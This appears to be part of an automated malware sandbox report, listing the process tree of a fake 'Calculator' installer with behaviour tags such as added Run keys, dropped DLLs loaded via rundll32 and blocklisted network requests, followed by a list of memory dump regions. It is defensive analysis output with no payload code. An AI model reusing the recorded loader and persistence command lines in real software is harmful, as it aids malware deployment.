                                                                                                                                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                              PID:5904
                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                                                                                                                                                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                PID:3300
                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                                                                C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                • Enumerates connected drives
                                                                                                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                PID:6732
                                                                                                                                                                                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding C21ACC666574A4894FBCB669CDE90FE8 C
                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                  PID:1540
                                                                                                                                                                                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 300F36DC215A0C52D0B34C13BB5A6DFE C
                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                  PID:3604
                                                                                                                                                                                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding D07123CDE91D24338EE2433C9A790E2D
                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                  PID:5044
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator\prerequisites\aipackagechainer.exe
                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator\prerequisites\aipackagechainer.exe"
                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                                                                                                                                                                  PID:3556
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator\prerequisites\RequiredApplication_1\Calculator%20Installation.exe
                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator\prerequisites\RequiredApplication_1\Calculator%20Installation.exe" -silent=1 -CID=764 -SID=764 -submn=default
                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                                                                                                                                                                    PID:4268
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--DzBsjyZ8js"
                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                                                      PID:6276
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x214,0x218,0x21c,0x1f0,0x220,0x7ffcaf8adec0,0x7ffcaf8aded0,0x7ffcaf8adee0
                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                        PID:5428
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1576,1214057349989469805,1657892559810768791,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6276_935835653" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1588 /prefetch:2
                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                                                                                        PID:7028
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1576,1214057349989469805,1657892559810768791,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6276_935835653" --mojo-platform-channel-handle=1912 /prefetch:8
                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                          PID:5936
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1576,1214057349989469805,1657892559810768791,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6276_935835653" --mojo-platform-channel-handle=2068 /prefetch:8
                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                            PID:5412
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1576,1214057349989469805,1657892559810768791,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6276_935835653" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2456 /prefetch:1
                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                            • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                            PID:6648
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1576,1214057349989469805,1657892559810768791,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6276_935835653" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2612 /prefetch:1
                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                              PID:4052
                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1576,1214057349989469805,1657892559810768791,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6276_935835653" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3060 /prefetch:2
                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                                                                                              PID:4600
                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,1214057349989469805,1657892559810768791,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6276_935835653" --mojo-platform-channel-handle=3536 /prefetch:8
                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                PID:5768
                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,1214057349989469805,1657892559810768791,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6276_935835653" --mojo-platform-channel-handle=3380 /prefetch:8
                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                  PID:7148
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,1214057349989469805,1657892559810768791,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6276_935835653" --mojo-platform-channel-handle=428 /prefetch:8
                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                    PID:3348
                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,1214057349989469805,1657892559810768791,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6276_935835653" --mojo-platform-channel-handle=3404 /prefetch:8
                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                      PID:4088
                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,1214057349989469805,1657892559810768791,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6276_935835653" --mojo-platform-channel-handle=2348 /prefetch:8
                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                        PID:6844
                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,1214057349989469805,1657892559810768791,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6276_935835653" --mojo-platform-channel-handle=3404 /prefetch:8
                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                        PID:5176
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_4623.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Calculator\Calculator\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Calculator\Calculator\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Calculator\Calculator\prerequisites' -retry_count 10"
                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                                    PID:456
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                        PID:4564
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 6452 -ip 6452
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                  PID:2184
                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                    PID:5008
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                    PID:7096
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                      PID:5956
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5956 -s 448
                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                                        PID:2228
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 5956 -ip 5956
                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                                    PID:5748
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 392 -p 2208 -ip 2208
                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                    PID:5176
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                      PID:5232
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                        PID:1816
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                          PID:4716
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                          PID:2260
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                          C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                            PID:3500

                                                                                                                                                                                                                                                                                                                                          Network

                                                                                                                                                                                                                                                                                                                                          MITRE ATT&CK Enterprise v6

                                                                                                                                                                                                                                                                                                                                          Replay Monitor

                                                                                                                                                                                                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                          Downloads

                                                                                                                                                                                                                                                                                                                                          • memory/772-281-0x0000000002A20000-0x0000000002A21000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                          • memory/772-283-0x0000000002A20000-0x0000000002A21000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                          • memory/1172-534-0x0000000005810000-0x0000000005811000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                          • memory/1244-583-0x0000000005CD0000-0x0000000005CD1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                          • memory/1280-698-0x0000000005280000-0x000000000532B000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            684KB

                                                                                                                                                                                                                                                                                                                                          • memory/1280-693-0x00000000050F0000-0x00000000051CF000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            892KB

                                                                                                                                                                                                                                                                                                                                          • memory/1444-233-0x0000000000400000-0x0000000000414000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            80KB

                                                                                                                                                                                                                                                                                                                                          • memory/1520-246-0x0000000004A40000-0x0000000004A41000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                          • memory/1520-241-0x0000000004A80000-0x0000000004A81000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                          • memory/1520-263-0x00000000051B0000-0x00000000051B1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                          • memory/1520-248-0x0000000004BF0000-0x0000000004BF1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                          • memory/1520-232-0x0000000000160000-0x0000000000161000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                          • memory/1556-437-0x0000000000FD0000-0x0000000000FD1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                          • memory/1556-411-0x00000000029E0000-0x0000000002A24000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            272KB

                                                                                                                                                                                                                                                                                                                                          • memory/1844-641-0x0000000000E20000-0x0000000000E21000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                          • memory/2092-706-0x0000000000400000-0x0000000000409000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            36KB

                                                                                                                                                                                                                                                                                                                                          • memory/2236-625-0x00000000050C0000-0x00000000050C1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                          • memory/2380-247-0x00000000020A0000-0x00000000020A1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                          • memory/2452-324-0x0000000005190000-0x0000000005191000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                          • memory/2452-316-0x0000000005890000-0x0000000005891000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                          • memory/2452-297-0x0000000000DB0000-0x0000000000DB1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                          • memory/2452-300-0x0000000001750000-0x0000000001751000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                          • memory/2452-303-0x00000000017D0000-0x00000000017DC000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            48KB

                                                                                                                                                                                                                                                                                                                                          • memory/2456-147-0x0000025756AE0000-0x0000025756AF0000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            64KB

                                                                                                                                                                                                                                                                                                                                          • memory/2456-146-0x0000025756890000-0x00000257568A0000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            64KB

                                                                                                                                                                                                                                                                                                                                          • memory/2456-148-0x0000025758F10000-0x0000025758F14000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            16KB

                                                                                                                                                                                                                                                                                                                                          • memory/2492-301-0x0000000002E10000-0x0000000002E11000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                          • memory/2492-295-0x0000000000AD0000-0x0000000000AD1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                          • memory/2492-336-0x00000000054E0000-0x00000000054E1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                          • memory/2492-325-0x0000000002D80000-0x0000000002D81000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                          • memory/2492-341-0x0000000007DC0000-0x0000000007DC1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                                          • memory/2492-308-0x0000000002D20000-0x0000000002D69000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            292KB

                                                                                                                                                                                                                                                                                                                                          • memory/2512-167-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            572KB

                                                                                                                                                                                                                                                                                                                                          • memory/2512-166-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            572KB

                                                                                                                                                                                                                                                                                                                                          • memory/2512-171-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            1.5MB

                                                                                                                                                                                                                                                                                                                                          • memory/2512-165-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            572KB

                                                                                                                                                                                                                                                                                                                                          • memory/2512-170-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            1.5MB

                                                                                                                                                                                                                                                                                                                                          • memory/2512-172-0x000000006B280000-0x000000006B2A6000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            152KB

                                                                                                                                                                                                                                                                                                                                          • memory/2512-169-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            1.5MB

                                                                                                                                                                                                                                                                                                                                          • memory/2512-173-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            100KB

                                                                                                                                                                                                                                                                                                                                          • memory/2512-168-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            1.5MB

                                                                                                                                                                                                                                                                                                                                          • memory/2512-174-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            100KB

                                                                                                                                                                                                                                                                                                                                          • memory/2512-175-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            100KB

                                                                                                                                                                                                                                                                                                                                          • memory/2512-176-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            100KB

                                                                                                                                                                                                                                                                                                                                          • memory/2776-306-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            136KB

                                                                                                                                                                                                                                                                                                                                          • memory/2776-326-0x00000000050A0000-0x00000000050A1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            4KB

